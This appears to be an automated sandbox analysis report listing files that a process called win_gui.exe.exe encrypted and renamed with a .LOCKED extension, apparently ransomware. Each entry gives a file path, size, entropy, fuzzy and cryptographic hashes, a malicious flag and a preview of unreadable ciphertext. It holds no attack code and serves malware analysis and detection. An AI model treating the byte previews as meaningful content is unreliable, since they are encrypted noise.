                                Preview:...wX..l.<..F,.I...h...eu.<W;..+....M......&.$X...=...7..3.2;.<w....tR....(.o!..Z=.......{W..M.Fj|......1z...EM....`..p..m....7.E.H.N.c....P...<.?..A..,..}.m..9...g.....+?.dv>._...H].2.M.......i....*p..h{e.C...0..}|........ZDa.$/.....5...f.TR...#..?.".\..3.k.O.z...}V.../...JKE.Kq}.P}.5....J-=j.....p.;o-..H.._V...[..8.#.e..4dW`.W.9D=.=&..A....^D.6...AF..\..8...%..AT.S]...}[Q..-.XC<..c.:U.....UQ..*R...A..,.M7A.!..i#...A~.....].*_.`.Q.?....F..m..}.....PT....<e.M.o#.....Z/.....eU.zf.'._..W[c6....L..........j..\h0....Cl^.....)........J....`"./.5..H....?.d.5.......# ......./.G...X.Z^...l....R...(...i......N.".y..@..;........&..a...^.*....1%n.Ub\P|.@.EI..Q.vZ....)q.kW<....2....|=^UlF.......YA.t....Y.!<../....(.>.*.U...pCW....7eEa._.....Bl^.EU..:I...._.&.P.`.I.h.d.2>Z..!...N/..0h......~.M..A...../z.....E&..(.....................fk.W...f

                                C:\Program Files (x86)\microsoft office\ThinAppXManifest.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5219
                                Entropy (8bit):7.969753279292825
                                Encrypted:false
                                SSDEEP:96:Dh6BO5x+1mAF6L7JsGB301ROufrTSVsLTdEvFrGzVOcevuAVOwO:16sx7JPS3JfrT/FI+Qc+VOwO
                                MD5:D5F2F8A8907DE87F924C46F815488EF9
                                SHA1:B0F04DA8D7CAEA4AAEB39BFC51A7B2695FA90E47
                                SHA-256:336BE0F8470C1DC1CCBAF627CED3EF05B29877E57F3E07D58B871743D5D14788
                                SHA-512:F8D58A317D20DCB7CF71CC4F4C4E57A95B1C4D0D3EFEB07A427E1C32C8CE14A6400CCADBC834244B2BAAA6805D4A10407902CEA5010483E71766DEBAD636F08A
                                Malicious:false
                                Preview:....Y...I..J...J.e.;Y.v.T.......YS...|<...].r...S....)...j._0.b.v7....B.7!.."F...ki..T....A.p.,T{..8$..N.2L ..$Y..B)X.*Q.......b..>)';U.Nc\.6...V.\R8 .....f&{.l.wj..i .^..-.5............4.&...Mh.9...H.....W...k1O.$......&.*._g.....1#/.j.9....2..3x.....4H.S.~|)}...c.>.'<....-(..{|.n.{....6.K7.?..-.. (.F..AR.}.o.....lI.i.......`(..~l.Q.).....q...j...i.e!0...b+...U.R.Dw..Z..^..z...:.%g...K.....?.6.\s.8...Sj{>.vkZy+.....k....=..|`a...xa..z...a..8....6@F..@..|...Z7|Hc........P...=L..:..c...%.."..hJ>qaA..."@..FE.....F.<Q....G.0..0-..S.40F.M...;S...b-X..K..u....#Y.k..o1...{NU.5.O=N.-.......l....r.....p......_S<#..+.od.]D...i.D./..x.C i..jH.F.....^....D*.H...$rs.-..V.. .(O.$...\.bXt8.bm..b...pg2..#..Z8u.EF@.2;..\.@{..s...y`...,......!...A>"9.c.G.f.....2...Z.$.....p.-:,f.......k6...\...7(....0:9_.$.P.k..c]./bW.....0H..D5..AM$.z.....A'm)..#.q.n8V..-1......N/.Y't.L..^g.......b...5.[..$..fR.....'1..}..I..../.....u.i...X....0..0.......lz.uO<...]n.q*.._...w

                                C:\Program Files (x86)\microsoft office\root\Document Themes 16\Facet.thmx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):739037
                                Entropy (8bit):7.952908837104348
                                Encrypted:false
                                SSDEEP:12288:Mz5RboJ3myGhslT8c2fscBNVRFCToZr5RCmUQHr+kRB5fWK66sO/NnnFwYlcgmH:M3bIrGCZ2xBbmsZdRC4Ck9H3p6pgmH
                                MD5:40368EDA6AE3B8354C360537C9D1237F
                                SHA1:AD40A4562D9082CDC011F76C90A7A74B64740619
                                SHA-256:9F0C86D7F9BB8D74E0E03E31BB09F68C74A097D8FF04C63C1ADC69B4FEC7D809
                                SHA-512:720ED4644D9C9295C6331F72989F97A472ABDC7E60056B91788FF58669A1A3DC612C770396F2C25D69FEC745A03E16E40BA94BF4C3EDD5F35E2F291F82860700
                                Malicious:false
                                Preview:.....#O8~.N6CvD%;.........M9.#j......;o............tv7. ..7.p...a=.C.v..66.?....F.?.;.(l.a.9f.Zp.k....S..0..sU..,.!..e9YO.].......-i0L,.S..6..^..g).8.fX.....m.v.......,urx.n...."r.1..!.k.O.-PR<.F3k@..i....E....O.*........&..y&QX....my>...s...b.#Ov..D...&....Xp..f.@F...M.oow.g8..*s.....C.D.1.q.ub....a.5..B..P.qF.s.m.5VU..a...Wq.g.ML..En^mQ[.y8.....Q_...}..GT....a.Sc.....&.E$!..!.x...]...4b.9B..Ck Z.g.$.pz............C;HC..'...1-lF[.#N...h...d.....3].W......>.jzk4..M.......}..g#%}..o..*.:0ne.6....3.......e(.EZn.+....fy3X.HP...&m........3Ox..-...-.>.,MCfOi.."....Uo1-Q..Q,G.... "S,...;y.f..*.9f.q...J.}...S[.^#<..2.A.vB.......m*......ee...f... ....t.:.P]..iF.>.....w...B....'P....#q..<....Xe.>.p(..A,;...o.L..?..%.e...;<..>..X..H.hz.r.j..j..W..7....1..x.U..."uYM,T.?..........a.*m...a.T...!Y;NvD.!...\.N..Lsp..I..e~....-....p..Y..bf..8!&'.....i.;[.b3.-...$.x8....r...>c=C'.j.R6T....,...!.V~oj..<.JT..O.......e..r......W{1N.W....l.Rs...#..`..

                                C:\Program Files (x86)\microsoft office\root\Document Themes 16\Gallery.thmx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1526742
                                Entropy (8bit):7.978499590623346
                                Encrypted:false
                                SSDEEP:24576:ES9q8w3Tg/ATAJJB+VE3S7yVI+eptWDftSwDwmwDFqCjjqItlu:ESMn3c/AU+8AyVIdrwDgLjWItlu
                                MD5:123FB592E6D8C3EBD968B7A8B0C9C3A7
                                SHA1:646CAC582B15D3694940DDACDF310A4D6C4B798D
                                SHA-256:D2860CA1E7140788F9523979F92508928973976DE9F67C4C45BDEF0E25A5AB97
                                SHA-512:9F8820CBDFEBC497F00CAF260898A6DE6B7C93AA68D50CE35B138527C6BE089130977C95831C30F8355C238BE72E6B14B13760D45C4D2FDEE017032A1F6D722D
                                Malicious:false
                                Preview:k+......(.4..T..x*m{.....(.,......[P..ZG.............h..5......[J..J&d.L_d...C...3......7..z.pJ:P.cNk..M..u..!.p....|:...CL.~x.....*.A.h#].. J....MHT/.h.~!...Hw..%.*..?...xt...b..].$.....kD...p..5...s...e...Q].\.6...........u...@<...xc.r..*?U.......47:..X4...2.}.........../J.h..).\...X.8.k.e.Y&..{..bK'...8ls...ik..4......{.qc..R..$....).N.P....Z.Z.k.?.y....x.5....l.. 3..".....E..]..&T.+9~.H!.C..T..e..q.@..oo...5..s.....tg..=......h....wkH...........ofK.U..X@..{...7..5d:. .wI....X........<.CI..[ax..U."Y._.....,k]ss..?.EP......2....Q...~.".W~.p.....lg.kb.-..RR6..."-.|..b..bf.....8...d...a(.L...l@.Q=....7.._...#.3s..EqB..k.V,.'.2....:+...(....c...5._.vO..m`.a...e..a..N....b..BR....r.^..n....c..?..Y.i...g.Nz.k.#`7.]..'|....2.oP.cMm../.w...t>A..J...(H.".(..pW...D......U..^...d...E.:."k/;k..h%.8..p...u.E.i..+..@s......f..X..6K*U......].*...U...5..`.|....h...!....:<V..l!KMn.P.4.r...`.a...Q..L}.....=..G........).]...U......g.Z1mRNF.V.N.m.

                                C:\Program Files (x86)\microsoft office\root\Document Themes 16\Integral.thmx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3446796
                                Entropy (8bit):7.9611405767191075
                                Encrypted:false
                                SSDEEP:98304:lAABjXt8md3x/pS6+X3Bzx3FVjbqOMhbJ52NID:pt8md3x/pS6uBzoNhtT
                                MD5:3CBE299688C617F3B5EE2BBC58ABE1C3
                                SHA1:DF2942835BEBD2C0F9CC825E8ADC63AC39536C8F
                                SHA-256:2BF317F84C4B861872181D95E29942266135997B99B98678A71562794CCE11B1
                                SHA-512:5234D4C7769EE962EBF7F6CF1022B17531EA8E9339BEBC0BE39363BA3D49C09BFDD27453877D9403CFB76E2BD337A0AA435D4CEA31FFCD2A843C93D5EC925B9C
                                Malicious:false
                                Preview:..%..V...~~.Q.....u...}..|....GW....U.pJ..>.....'.}6>^,4...Q..K..!...3|.6.<..^....vk..*[e...<t.....c....F..G.e.IO.A.$X...}....HQ.....Z.C...eM.n...9.i^....J.k.,O...a..{.V.....e...........&N{...5...j.MJc...T..e!.....$.(..^.I.{r...}..,..0[.DK.i.Ny.N.T}C.v1|.Z*......n}<.......R.)....#.R.....X...."q...=`d0L...Br .&..}Uw.h..a... F.....}-......j........U*.A....TLR...4..$3...#....c....m..f.[H...+-...Ep.o.......u......$.-9.$...Pi{?.....k.r...l.{eop.Pj.L.e..e...i.*..v..).p.6:.y.H>..6t..B|$jss......S..m......g.q....).]........E.......V..l..|.....J:...x.....P.R.......A.......Y;W8h..=T...X....Km......B..&.h.P..+5......z.....sf.l;K..._..OxbRa..L.......'$..EqC.)d...]yQ^Ne..._.o|.xQ..~{......0.8f..]%!...._/..O.....F$'H)W......t...-%.f......4..H..!:I......T...N.>|..W|.U#..).(..].eN.A0.;.fm...<.;..mK..1.......R.:Q.r.0.....\u.;7....n...Q....tv.<..k.%..".rrL.?.....1..F8i.UO+.....`R...2.i*.....l..;S..?..M.x..<>...T*...x......q...AFi1.%.s...fvb..r...R.

                                C:\Program Files (x86)\microsoft office\root\Document Themes 16\Ion Boardroom.thmx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1595467
                                Entropy (8bit):7.945953786651401
                                Encrypted:false
                                SSDEEP:49152:yJAYlO3BpOmxQ0CpGPlt93AGnQ1kxnqIVF:yJAn3Up2RAIQYnqIv
                                MD5:38076B2B0AF360CADDA45731ADA0436B
                                SHA1:5A9BC147E43FF271A6868E649E08E3A47F1AE1FB
                                SHA-256:37F111E1D565F1AFC6590016EB3738AB75AC76A0A590EFF2767E413C2B8BB039
                                SHA-512:90BD4D412088350BA70D4A3799D8B42CEE87FA287B08C91108158A90531C1377D8CB0E076A7610BFD1594038A34E36BF2F0EADE4C38FAF6F00B6CB20C5D93521
                                Malicious:false
                                Preview:R..<X.*G........69.\vc.Tt........p.{.. .;&x).1U.1..M*...j2H&.|....w..c...H.1...v.r@...?.%.-.W.M(dS...t.b......9.t..........a....xt@......}......j'Y.x.L..i.:....d...........k..Q-~..l7.W..T..#....t...<....p.1.p9.5. .}.@n..D...G....-=..x...W....J.u.xO.Q...D],.r.p.4-..I..E.......0..`...h.{5h?)..u.......D>0..'-.bZ0......q.W~SbWe4SlX..L. I...MJ.gY....i...o....m5..D:X..g7q...(e..h.I....n_.1.......9..5..f...w..@.S1.6v...A.j.?/3j.-.c.q....e..L....W...0.,E.KI........h.K.^j.6.n.VVP..9.*...|]...S.{.vi..V..F$uY.Y....o.....H..7........g.r.t.........|`.mi.}...5.Eum..5...t..0....L..p.T...-Q.v.w...eFlJC...T..o.=......Q..)ui....j94..O......Fo..7.L...I..nC.>..=...Ew....u.9|..E.+..,....).w..].-f.b...d.H.@V,.;..\o.....UZ..z...}...5.u.H ....z5.#zSj..z..E.O....H$.W.>.V...w&g.......-.s...1.....$X...._...Q..n$Y../,1.t.$W..O.~O<.....H5...X4..].D..........w..$.P....j$..4b<Gq.....".../.x.r..deE.....!.R...y.....W!. .7$.S.J...[4.DUb..[../.F.]..k...}QRi..1t....

                                C:\Program Files (x86)\microsoft office\root\Document Themes 16\Ion.thmx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1838139
                                Entropy (8bit):7.948010826456849
                                Encrypted:false
                                SSDEEP:49152:PYo3rCYlO3BpUxe0J29T8g+ycADO02rvizPctl:1Wn3AV29OycJ3
                                MD5:715C4EA911AB34C9BDF31E9DC3E0CDA9
                                SHA1:D606F9051883D9621C72D78AAC6801AD6EDF4E1F
                                SHA-256:748278FA2663C722AC479DD11752E1B6FE8841797C53070474825AFB4C0F52B8
                                SHA-512:6E9DC0E2DB54BDDBF1B5A786A7945B1C4D36C196DD359EC65ECAFB1506BAF1A60EEF695EEAA7986B0380A7D847D266C496ACF6A3C6C8FA80D884DF2B42BF1EBA
                                Malicious:false
                                Preview:.......wm.e..&.f...^..!K...#gdp.#gs,_6..CL..FG..^K);O"..o....y.*...Y.]..v..*.~.....].7t..y-.....s$.bN....I...|...uDA....&...A..[.&.3.e&x...A..u...|.?./.h._.P.p..B..4.I.X.&.W.=.2.a7&.X...[..E.@....~...".}_.9;....+Zs..U..r... .m.l.Lw.F.4.....k_~0Z$.JBr"M.o<i...m........._...........]C4f.d.....> .......1....,..B..r..l..]:Ar".^G...-.C|..sz.b...I..u.....;>..U..l.n.9....>D...].....r:..9+.000...X.y.{e..E4(o..){.A/..*K........?.7K....J..Rd....[&.h...p..]_..Uh.O.omj6U.A|....v.;.U..D.5&.}.......d.\.$...L..2y....yI..`fv...}/D......=E.=..{...B.;<.#*...{..2..}.....M.KkW`..+.i..K.B*)}.*...e..g.K.)..M...\.P.h..I.(A.....b...Y...O.r....r.0Do..WR.?.k).b.:._Ws=B;.3.2r~..tv...o.-.....}|.D...4F...:i.....%....t&yES...G$...WpS&o..|bl..L..w.g..g4..G........}4........`].1v$....Q:..JY.6...N...O.S..b../&_.v..g.UT.F..b...c;>....X..#...'m..j.9.......pI...?....h..i....4.n..G.y..P..\...00.W.........`.a..$......X..?I...k..k.SLx.J.7ql.u...m8....X.s.H..|..;l7.../......._z."...

                                C:\Program Files (x86)\microsoft office\root\Document Themes 16\Office 2013 - 2022 Theme.thmx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):329396
                                Entropy (8bit):7.999458971342388
                                Encrypted:true
                                SSDEEP:6144:UIlV/eXjPPREuCnQIVmI8i4lOHIMfo1DQB2jo7TyCnIYEcFJGBgWxY:UIlhWjBEuAQIII8xkQ10mgTqYEcFJGP6
                                MD5:347EB0D21679FA0359E01CF62F2D0AA2
                                SHA1:A48234F9ED7D030C3FD25777457BE87D30868C82
                                SHA-256:6A0D5A169D5D625257D2B733853CBC7203C919DE46366687E358CE916611846B
                                SHA-512:1C882EAAD747B41D3E512907F1F7F59B63AA5C4EB4FB176CF3C881580285593E69D071520AA802E66CABD7FB02331B9B12F17E6AFA1F89223CD70F1C9E0AACDE
                                Malicious:true
                                Preview:.II.[.f~..8...k.;...f.Q..@.....5.34 .)....$2...gh...f...).CE..h.F...0Vf.~B8..{.....v.rQu.e.$.t.Yo#..o....R\.QU....SZ$C...9>|.78.../....\w.a...c.6&.........}.x..U.....O.mb.mK'.Yr...@.5.K9..s.*q.'l..:.1.B.C.$.0.:..'.g...I.l7P....=......X..3a..Ri)c..p..:...]...A=./,G..~..l.MpTfe...$.O./....WR=Ga..A..x.^cm:....4....]H.L.V.r 3P...].xfR..5.....,x....U..pLt...%.Ik....1.......-SdJ2.7.......R.rl...D.;...2...o}...d.h..@..6.......~DUa.{...N1.......g.BS...Oti.....0..6uY_*}99._<..w-$..~.su'T.!....c-@..Yu..w.tK...._.d.3....m..71T.:3B;%B>..H..7.....@........$.7'.-V.$.o.$.q..#..*.\.....J..Z.P.y{...S.F..!C...%T.8;gW....<...I.5;..P...s.4.M.sI.}......9$#~.(../..9..0..Ch9|0..b<.9..&..C..U.%....FO..O.. q....x.k..YN....C<..'Z...I....A..:#..*V......s.3.~.s......J....6...$....^.s........l.n...*oB%\.6Sv..f....aW.X.......W....=(..n......}...e...1..t?....... DP....S.}..FD........SH..4f>.......~HJ6z.}..X.?..A.-..<.V#(.n..d.Q....+..)U...(.[... ..s..c...b...C...K.

                                C:\Program Files (x86)\microsoft office\root\Document Themes 16\Office Theme.thmx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):307491
                                Entropy (8bit):7.999459976821999
                                Encrypted:true
                                SSDEEP:6144:hBp/fdX2jB59w/KZ+9+TMx/Mtu0JcBj0+eWVc3+WOyD+6IkWDKgdhf9agd2jUBwZ:hHdGjBCKo4M1hqCzDcuWI/rfyPEVy
                                MD5:9271A4B0D915B9484E20C29C6B3D8810
                                SHA1:D4B1EE953A292F6D5CECB7110A675BDF9517F7D8
                                SHA-256:C7A4AEE627F2B55D685CD9C9D52FFDF9B0401FFC85EA8BCAE292AF3D4681E60F
                                SHA-512:11873BE6009F6736841AE8EB3E84D77082588431083AFAAC0AB1B31017E11C34C1B1264A91B9902D0681013565BD647FFAFE8CB95299047D8D74C5FB6514E2B9
                                Malicious:true
                                Preview:);:u.gC.....$..HG....(%_.-....._.<...FU.(.1;q..-./....A.e.U.(......._..]....8v...I.K9..?.%R...(...p.7....d.<.2...<......<.`W..VQ.c.].p..<..[.....U..K...X.E....O...[*h.6..5T.R..P/.^b.{...Rk.EA.=....".D..j.|%...%G.z$]SUS....`.....E.4$'....t.rP...nJ&S'....3G!f.....9..YE;.d.z8ohe'.a..|.l.t...{......C....G....Z.#.].'w....y-s....E|.a...@b..8.@.0.....0.._.=.E.0H%....W)!..vE..3[=.i.....8...*...di..'*.Cf.?..!.........K..m....e..G.#j...%...&....oU..H.?VU.....N......U.^.|3_..-..0.._+s.Ze)...WS.&..$I.0.MpVP.:..p....35'D|...Z.e.g$-7..l..v.p@e.\<..8...}`Z.......`~...o#.'P05..a..y+h.M;.)....&)._L.....Jn....*.qe.U[ .n.."..[.......(X.j7Ls.....rzu.......N.....S.(I%3...H...>VKg........|k.U..!.4q.!T.+.w.6\vg...f.TsiIPi1..6&@R....e_...NmZ..f.......SM.u.R>.kV.w.....%"..zn.G..I.g.2.......:..0.r......(.R.M..#.B.5R........^..*.......'..._.....\d.....|-.<..]=..._.9sB......;......p.2.......n.....;.......B.8...... -TV1..qF7..9..R.v`1. ..vV..@...}J{..H..m8....

                                C:\Program Files (x86)\microsoft office\root\Document Themes 16\Organic.thmx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8706177
                                Entropy (8bit):7.975157344042223
                                Encrypted:false
                                SSDEEP:196608:yjK7YlmZcPZClC6QAZ2sjCvWJo2sKLCIV5JAmadFS/Zurw:KHlVUPQAriWJo2Lrsrw
                                MD5:D0B4E6FCA8933A3D4FBDA695461F280B
                                SHA1:850F0A2D1FBDD070E44755114A7CC81CDA88ABA1
                                SHA-256:944CE6CBC6A65F956A2BC2CFB2641E6396B8FA00C82A8564AA64602F8C881597
                                SHA-512:17C27EFC438DD94653CADAF4D4F1746B3D668AD0099680B1DF0282B09806459C1AFE94A38D815C49508CE0494175528862C410FAA1A8A85AA5791FC8DE299BFE
                                Malicious:false
                                Preview:d...M.........?!KP0........ B.v.?...L.^.F...L....&.........5g......aR;...g{.......6}d.P.<....6....3....R..1....?.]~.8.].....h.7$].......z..n.}(....N..H.7.&a..U..K....%#l/L..x....cT3..1..q?....:.=IZ..$.#..<..X*..<].2.!.3H...D...U.......)s.W..;..P./'.;a.R.^..;.Dv.2.....qi..L}......{.1....,..V =y...;$...w,'y.v).......v4s.t*.Q..|Y.......!.;.@.'..~.1..L.0..4..gZJ.9..=w....Z...l.;...-.?.....Ni.._.E.....~...A..c.............^.^.w...H'..D...b.....U&........!&......7.._...b..:F....m.s .........{.9.>..UO.J\s...r:.[;...J..r..#.cH.;v.:..E....}...\hy..[.1Q...g....UE...........z.5....g.>jD.t......m..[1.Xq..II..t.3.,..A.b.JL..T(.] D........d../...... .:....K....d[.^...@+.@1...R.b..E.M...Z........0.:...^...<.).....h...R 3..4..d.(i.G/.N.2...<-.J..[U.....NW.uV._+.z...Z..~.Xe..s[......,.=.<..@..V..#c.B......A_..nH{j..@&....v.'.m.b.....1a*...uR#...R.1..Y._.n..qAP....g:......D..)....k....z.5.....?.u..;..H7.`3..TmS....D...b....d..8O.G...#..)>.v.:.....>.

                                C:\Program Files (x86)\microsoft office\root\Document Themes 16\Retrospect.thmx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1623868
                                Entropy (8bit):7.92955460291453
                                Encrypted:false
                                SSDEEP:49152:dqah71PI+6fB3Abk+iQHZtHmV4RfiMNccSvIr/nSh:sag+6pQbk+iEZtGV4lVWcSvIr/n6
                                MD5:5315ECE7C5085A4DE23459C4BA257031
                                SHA1:C23F6401E36FDEDA4A4AD6678F6CA511429983CB
                                SHA-256:A9E293592475C613E890A9F5576D01C00CBA05BFB2F5E7A85515666EB9E78FE9
                                SHA-512:7729DCE777763A86BD172D7B8979DFD3D640BDF3A246A6387372C699C17AC6D489C5C5DE38BB1FD0CA8FBA86C24AC812DAA672BE68A503AC5737B9101A4886D4
                                Malicious:false
                                Preview:!.-|.<._......f>..L...H.8.cQr...%.E........./S..#{...v.6.N.~.W:yj.....N.....6.A.82...o.A+[g.Ru.+....C.CT..b_C,X./.-..z@1.h..J.{2N.F.....QB..........,*6....W.5...0{N......&...x..zN......\..x....3.....7.Gu.*..L....5Th9'|..#.@.l1..L.5%|..kA.....X+...#5JE+..A.....'....q.R...)6....v...1.z]6.r.WO....z.>.@Ld[.q.J8..gC.....5q.(].w.].......-zXdS.6........t...\.A..@n().....z/T(}.k..Fs...r.>...7.NP.v.IP.......5je.5Pc.Y.WK.....M.L...P..`C.>L.3.s..e......<.x..&2{%..(f>....oLs..'1.......W.r,(..#8.. .~.."~....5.-.]..f6pg.K...S.j2...4....>I+..k{...\g.W[_~.w....2l..`1E.........,....}....t..-ob.&...,x..6..h...@)B..EE#S.Hm/...@.l.;.`H.....J...\..._@..lT.J...iEg!.a...9.3o..a.\..U:....L....x.*...s...2.i.T-.--......F=.2h.....:){.V<..........P%.[......W...q..#.t?#.7.{t.K%.3R.+v...Y...MX6.M..}..q.Aom....h...e....y'.n.C...<...~..H..-v.......b.".~...+.e>.4..n....O7.7wV.....`euD...,..!..f/b.?.z.E"7...w..Sq.g.*..{,..w..+Z..8....q".2..'...7.d.DFLo..Gs.r......B.6e..F....u.....

                                C:\Program Files (x86)\microsoft office\root\Document Themes 16\Slice.thmx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):865418
                                Entropy (8bit):7.941334721124736
                                Encrypted:false
                                SSDEEP:12288:3oUUO6zqjl6HXIgRoy0Lop1uns8fj7dfFfqVTeNf+pJIZDOZm002sPzPEpX0+s0R:zy35VooKsEfBaeVMJLZm0kajwuQfUX
                                MD5:2DA2F5EED127B1A3E0EC6E564BEA2CC4
                                SHA1:D4429D97CB337948DABF08B4F2D93E5781F89C64
                                SHA-256:F1B39F5E19D85EB736666741DB3C0D5B19BDEFE93D6E087425F7BA3DA10D7DDD
                                SHA-512:FFA40058B13F6B457F412637CBEA270CFA31F20102327E02A214956ACDA816876C485002F40758ABAFDC68FD65B09905A2DF846BD66B87ABE4B64B05C5995408
                                Malicious:false
                                Preview:8.[..Z.. ;..`..'.-....Ti......B,.C.d5.`....1....j....S@.^M...hUF...9....zs....x.C...68B*....+....ee...S..<.Q....+..-....M.?N.~b"...C.x...x..v.0b~...%.jG.p........j\}s..|.E....(&.hA.^..Y .9lE..~p^,..w.l./i...A.+...)r.5T..|..P.I..&...+.X..T,......_.K%..7.L.ZQr.....2<>..{..z~.d..>.).M.....%...L....b.co.........F.!. ...7R..k./....o6...^.b.fDU...^,+gc).V&..!...F.L..#.4.{..*...... ..[.n...n6...7NF...(..#U.zm.b..P.I..aR.+.7...@$.....b.`...q)..d...Ro..Q)...BT.....,p.....r....X.;...........aG+..t..Lg.].G}./....Q6..6.8.*......M..@..|.}?..g.[i.=....r..a...w$..e...*.{2P.`-w.z..v..`.9+.^g,m......V..u.!_.^aQ9'....C.T...aw..q.....z...,...x.Y. .......9...../.. ..FW_.Z ...W..7..~......O......u....ILLW.4.........xT.d$........r..Z...#......-.ST.|>..ez8tz...g..sD..V8?.9.....K..i...2...\.....,O..^i...._-[...L.'.iP...BT.n....y..s.h...5.q..!.eG.......>...`.x....S..p.a-^.n..z.&.q...4!._...5E..S.>F{.8.sO.c..0..... ..Q6.K+...{.*./W....8z.H.O.....7..<.q..S.p...6.....D

                                C:\Program Files (x86)\microsoft office\root\Document Themes 16\Wisp.thmx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):772641
                                Entropy (8bit):7.9542632556813
                                Encrypted:false
                                SSDEEP:12288:ICcEvhvQMuHM2MOQj7NA7JW3YYNLHFvHxozHUt3Uz7R6Z+ptghUGJDTQMUryRmJa:IVEvhoDi7NAANLlvHxoz0t/ZdxwJZ9De
                                MD5:2E911ECE0CB38FC52F5D674A5F96DB74
                                SHA1:A1B6E28E2EE82A6DC9A20B5187E3BAAC18018E12
                                SHA-256:FF162F1F020624B2F6617FFD7573A3B64CE9FE451ED33F4035E7D453C3A4D5DC
                                SHA-512:7F785A50255B4BEC10C9D9448D4117148426509E813603403598B347159DB6EB5C28E4445010F5464CACA910E09607558948C0F7F67C52794BA2BB508CD69E06
                                Malicious:false
                                Preview:.K...H.7y..<....wV......d..."..c.Lx.dL......N?..".....,}#T.i.b...@......]H.("nB..`.q...e..,.Y.s.@y..Qz...b..`Xx...Q.5U.7.........4.......3[).W..g......%b.-..3.........Z.x...T..~...G...P..0+.......<..PTN.f..e......Lb..&.~.6r.i-r...m....t\Z.%...q.u..u..f>.W |tx..`Ka$3.....w..8$..;...Gs.W....OG^..!.o...2.S.....r.}[Y_..@..$.2..*.2.ai......(......,...nk.O......7....g.9.q..aF.j...nu.b...hJ.+'....X........WJ7B.3...]..,.........PTlk.&C.aX..........^.j.r..b.,..c......i..xi.i...j3....NcP'a.:.....[........x.....3.:i...l(;..c...:.+v.E..9b...#.....N..!r...F3..4.K..Nh.`U..q..(.).......|....i._....M...c..5............3/W..X.....J....E..i.1.G......:....op.t....${."...j.-.'...`........'2.)h....U.)"...U....Z...6r1...c..,.x.......T&..r~.8r/=..........^........#.^*. R..G P5s.S.yD..t..kEO..Z.[F.D...a..].....Hk.....G...EU.F.teA.5.S~.<D..Ot...!M...9.?P..G....c...@.t..Z..]p. .B..K.0.uE.&..6.~}...#s.(.fg.`.@.8.-~n..Z....R._^............P.c..bsNr.....%9.

                                C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):68348
                                Entropy (8bit):7.997326446559704
                                Encrypted:true
                                SSDEEP:1536:0VfAk/nKkrvuGVpmGUvwWiie/AxOksjmb1ZvnxsXHT3uCTHykX5:cFKkDvVIPCAx3bhZ/+Xz+cJ
                                MD5:05D51CBBE2B41ABE9D0BD26A936A36FE
                                SHA1:2AFAD2B24F173C5E105E3D9301AA57D9184921D5
                                SHA-256:DECC15C02058939A1E7F71BE31303A6DA255F9A7242764F38AA05421983B869B
                                SHA-512:448FC1950DDC24BE333FE5ABF9464BF1E18948F7090FF99255AD78F8C466E113B0D5F15C0DDDBB92D355828AB8862C5A5F792D87BD77763C7685F10449D781A4
                                Malicious:true
